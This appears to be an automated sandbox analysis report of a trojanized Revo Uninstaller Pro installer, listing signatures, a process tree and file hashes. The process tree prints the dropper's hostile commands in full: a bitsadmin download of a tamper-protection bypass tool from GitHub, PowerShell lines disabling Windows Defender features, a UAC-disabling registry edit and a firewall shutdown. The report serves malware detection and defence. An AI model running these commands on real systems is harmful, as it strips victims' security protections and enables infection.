Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    23/10/2024, 19:26

General

  • Target

    7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe

  • Size

    18.6MB

  • MD5

    7076117f0c6d84ffd59192a4b1e7208f

  • SHA1

    08b793fc796ea5ef45f5a0d3ca989d2a2852a279

  • SHA256

    621d9de231168a4edd7b0d2bfb27f24165a1996c7a540e51fa31317a506a6518

  • SHA512

    b4f30483d16a6a38afedb91bba320e051be8a0ea94ed0e23c33f4fe0828d0ff08d8a0663aea6b2c5945b9649605217722037d2d214c3167d99fc90310160ff9a

  • SSDEEP

    393216:bsPcjinkzVPjpLnWsDkCSDCe0nz5QVIGKXTpchSpMtm9LZ0+ecQwX:bgFn0DLnC0zuuGKjpch4++em

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 23 IoCs
  • Modifies system executable filetype association 2 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Users\Admin\AppData\Local\Temp\is-11UFQ.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-11UFQ.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp" /SL5="$400F4,18678062,848384,C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2292
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\RPKxchvc43an\5jayrzw1q.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2860
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\RPKxchvc43an\avNIprUwIk.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2952
          • C:\Windows\SysWOW64\bitsadmin.exe
            bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
            5⤵
            • Download via BitsAdmin
            • System Location Discovery: System Language Discovery
            PID:2880
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2816
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1512
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1988
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
            5⤵
            • UAC bypass
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3028
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2160
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -PUAProtection disable"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2076
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1968
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1620
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2072
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2472
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1680
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1936
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "netsh advfirewall set allprofiles state off"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2768
            • C:\Windows\SysWOW64\netsh.exe
              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2308
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\RPKxchvc43an\main.bat" "
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:380
          • C:\Windows\SysWOW64\mode.com
            mode 65,10
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2116
          • C:\ProgramData\RPKxchvc43an\7z.exe
            7z.exe e file.zip -p___________24467pwd13287pwd30257___________ -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1476
          • C:\ProgramData\RPKxchvc43an\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1956
          • C:\ProgramData\RPKxchvc43an\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2104
          • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
            "afcdpsrv.exe"""
            5⤵
            • Looks for VirtualBox Guest Additions in registry
            • Looks for VMWare Tools registry key
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Maps connected drives based on registry
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2612
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:2196
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:2152
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:1920
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:608
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:2396
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\RPKxchvc43an\delXPDUR9c.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2692
          • C:\Windows\SysWOW64\timeout.exe
            timeout /T 180 /NOBREAK
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2880
      • C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
        "C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3068
        • C:\Users\Admin\AppData\Local\Temp\is-GH3UE.tmp\Revo Uninstaller Pro 4.2.3.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-GH3UE.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$3016E,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          PID:2636
          • C:\Windows\system32\rundll32.exe
            "rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
            5⤵
            • Drops file in Drivers directory
            • Adds Run key to start application
            • Drops file in Windows directory
            • Suspicious use of AdjustPrivilegeToken
            PID:2208
            • C:\Windows\system32\runonce.exe
              "C:\Windows\system32\runonce.exe" -r
              6⤵
              • Checks processor information in registry
              PID:1812
              • C:\Windows\System32\grpconv.exe
                "C:\Windows\System32\grpconv.exe" -o
                7⤵
                PID:1980
            • C:\Windows\system32\regsvr32.exe
              "regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s
              5⤵
              • Loads dropped DLL
              • Modifies system executable filetype association
              • Modifies registry class
              PID:1912
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1532
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:2220
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
              5⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:1916
  • C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe
    C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    PID:2008

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini

      Filesize

      111KB

      MD5

      c37fb8c46d0281dd27768fd1101614f0

      SHA1

      03e736a49687f9ac10b35cc791e7df5b7e55f4d8

      SHA256

      ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c

      SHA512

      b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini

      Filesize

      114KB

      MD5

      6c9dbe894ea20eb190db6b483f17030d

      SHA1

      1bac02001cba8c083b987264f1bb89b05b74155f

      SHA256

      24ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846

      SHA512

      b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

      Filesize

      2KB

      MD5

      edc78deb34de240c787b1011161e9a4e

      SHA1

      2d31275530dce33d3bc329991c8ad59e1b303577

      SHA256

      69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b

      SHA512

      e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

      Filesize

      9.6MB

      MD5

      1dd8459f2595e4c0603ad491590f6952

      SHA1

      607efe3c74388fb1e4b19f8f7ed2520ebfc349a1

      SHA256

      5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d

      SHA512

      c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d

    • C:\ProgramData\RPKxchvc43an\5jayrzw1q.vbs

      Filesize

      96KB

      MD5

      c84933bcccf41369ef9ecce015b86ed0

      SHA1

      624713276ae217d8d05c03598eecd31209c7f77a

      SHA256

      ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679

      SHA512

      221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363

    • C:\ProgramData\RPKxchvc43an\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\ProgramData\RPKxchvc43an\avNIprUwIk.bat

      Filesize

      22KB

      MD5

      b0a7842dd51df8942bc8b837282d1c2b

      SHA1

      0e9432597657c28ca9ac766ac7bf0a903d6aeb3b

      SHA256

      4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8

      SHA512

      b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\93D4PXG4ZE155RCH4OQJ.temp

      Filesize

      7KB

      MD5

      ea33944eb622fb5332cf35788364e11d

      SHA1

      1ff1af45ff0373d13c037bc6154d6cf1511bd3d7

      SHA256

      677dd8ef68601a92a918e5be910ca5f73e79027d0c7ef115f39a4a730c8ff290

      SHA512

      f7126dcb1709e11f11b41a5a02456bd1edd09c1c4703c13a28af971a50f1f329c9e24adab4bd8bc888c7c7114fc49cf129ef57802be15d31069066e4a296676a

    • C:\Windows\System32\drivers\revoflt.sys

      Filesize

      39KB

      MD5

      498c3d4d44382a96812a0e0ff28d575b

      SHA1

      c34586b789ca5fe4336ab23ad6ff6eeb991c9612

      SHA256

      23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba

      SHA512

      ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1

    • \Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

      Filesize

      14.2MB

      MD5

      dc21d689cfa1860e8820ed0ee45b1f2a

      SHA1

      acf2db6df76114601a2e58097629e0c8cbce129b

      SHA256

      01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c

      SHA512

      a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140

    • \Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll

      Filesize

      188KB

      MD5

      75d7bf3468669a6c3df6f4d048315128

      SHA1

      678d3b531738573520367b47c0cd52cf5e431fa0

      SHA256

      927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae

      SHA512

      9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e

    • \Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

      Filesize

      23.7MB

      MD5

      ddb041550a3e69764cd9d7d3de3636f3

      SHA1

      1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c

      SHA256

      54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975

      SHA512

      00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800

    • \Users\Admin\AppData\Local\Temp\is-11UFQ.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp

      Filesize

      3.0MB

      MD5

      40a7717c92235c89dfcc686c6c944653

      SHA1

      7a625cd006a6fbaa90f777b03e920e195fa3edd9

      SHA256

      a1ddf79410b81fd2368c0b02fa30e10a1029c994216b67bab98b7d7ffd63d9a5

      SHA512

      c98a32f9034c931538ef5f74aa177c63334cf1b562c97450985b04813bcf8d7b5e66d58ab68d23673a634260aab7be4c7873e1badfdd1262c2dc37464fac61d7

    • \Users\Admin\AppData\Local\Temp\is-ETK61.tmp\_isetup\_shfoldr.dll

      Filesize

      22KB

      MD5

      92dc6ef532fbb4a5c3201469a5b5eb63

      SHA1

      3e89ff837147c16b4e41c30d6c796374e0b8e62c

      SHA256

      9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

      SHA512

      9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

    • \Users\Admin\AppData\Local\Temp\is-ETK61.tmp\b2p.dll

      Filesize

      22KB

      MD5

      ab35386487b343e3e82dbd2671ff9dab

      SHA1

      03591d07aea3309b631a7d3a6e20a92653e199b8

      SHA256

      c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

      SHA512

      b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

    • \Users\Admin\AppData\Local\Temp\is-ETK61.tmp\botva2.dll

      Filesize

      37KB

      MD5

      67965a5957a61867d661f05ae1f4773e

      SHA1

      f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

      SHA256

      450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

      SHA512

      c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

    • \Users\Admin\AppData\Local\Temp\is-ETK61.tmp\iswin7logo.dll

      Filesize

      39KB

      MD5

      1ea948aad25ddd347d9b80bef6df9779

      SHA1

      0be971e67a6c3b1297e572d97c14f74b05dafed3

      SHA256

      30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

      SHA512

      f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

    • \Users\Admin\AppData\Local\Temp\is-GH3UE.tmp\Revo Uninstaller Pro 4.2.3.tmp

      Filesize

      982KB

      MD5

      74f1186a6d3bc01716681712c6b24a74

      SHA1

      9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18

      SHA256

      d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d

      SHA512

      bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0

    • \Users\Admin\AppData\Local\Temp\is-RU6S1.tmp\_isetup\_iscrypt.dll

      Filesize

      2KB

      MD5

      a69559718ab506675e907fe49deb71e9

      SHA1

      bc8f404ffdb1960b50c12ff9413c893b56f2e36f

      SHA256

      2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

      SHA512

      e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

    • memory/1532-321-0x0000000000400000-0x0000000000E32000-memory.dmp

      Filesize

      10.2MB

    • memory/2008-349-0x0000000000400000-0x0000000000E32000-memory.dmp

      Filesize

      10.2MB

    • memory/2292-47-0x0000000000400000-0x0000000000716000-memory.dmp

      Filesize

      3.1MB

    • memory/2292-12-0x0000000000400000-0x0000000000716000-memory.dmp

      Filesize

      3.1MB

    • memory/2612-365-0x0000000000380000-0x0000000000454000-memory.dmp

      Filesize

      848KB

    • memory/2612-367-0x0000000004FF0000-0x000000000504E000-memory.dmp

      Filesize

      376KB

    • memory/2612-366-0x0000000000600000-0x0000000000622000-memory.dmp

      Filesize

      136KB

    • memory/2612-368-0x0000000004220000-0x000000000424E000-memory.dmp

      Filesize

      184KB

    • memory/2636-169-0x0000000074A30000-0x0000000074A4B000-memory.dmp

      Filesize

      108KB

    • memory/2636-333-0x00000000005C0000-0x00000000005CF000-memory.dmp

      Filesize

      60KB

    • memory/2636-76-0x00000000749B0000-0x00000000749C1000-memory.dmp

      Filesize

      68KB

    • memory/2636-78-0x00000000005C0000-0x00000000005CF000-memory.dmp

      Filesize

      60KB

    • memory/2636-173-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/2636-170-0x00000000749B0000-0x00000000749C1000-memory.dmp

      Filesize

      68KB

    • memory/2636-168-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/2636-59-0x0000000074A30000-0x0000000074A4B000-memory.dmp

      Filesize

      108KB

    • memory/2636-332-0x00000000749B0000-0x00000000749C1000-memory.dmp

      Filesize

      68KB

    • memory/2636-330-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/2636-331-0x0000000074A30000-0x0000000074A4B000-memory.dmp

      Filesize

      108KB

    • memory/2636-171-0x00000000005C0000-0x00000000005CF000-memory.dmp

      Filesize

      60KB

    • memory/2636-347-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/3052-2-0x0000000000401000-0x00000000004B7000-memory.dmp

      Filesize

      728KB

    • memory/3052-0-0x0000000000400000-0x00000000004DC000-memory.dmp

      Filesize

      880KB

    • memory/3052-84-0x0000000000400000-0x00000000004DC000-memory.dmp

      Filesize

      880KB

    • memory/3068-167-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/3068-348-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/3068-37-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB